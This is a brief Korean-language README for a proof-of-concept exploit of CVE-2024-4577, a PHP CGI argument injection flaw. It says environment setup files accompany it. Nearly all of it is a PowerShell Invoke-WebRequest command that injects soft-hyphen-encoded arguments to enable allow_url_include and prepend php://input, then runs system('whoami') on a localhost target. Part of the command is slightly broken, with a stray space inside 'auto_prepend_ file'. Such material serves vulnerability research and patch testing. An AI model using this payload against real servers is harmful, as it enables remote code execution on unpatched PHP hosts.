
CVE-2024-4577에 대한 개념 증명 익스플로잇, PHP CGI 인수 삽입 취약점으로 조작된 HTTP 요청을 통해 원격 코드 실행을 가능하게 합니다.
CVE-2024-4577 환경 구축 파일 및 PHP파일
--poc-- Invoke-WebRequest -Method POST `
-Headers @{"Content-Type" = "application/x-www-form-urlencoded"}
-Body "<?php system('whoami'); ?>"-Uri "http://localhost/test.php?%ADd+allow_url_include%3D1+%ADd+auto_prepend_ file%3Dphp://input"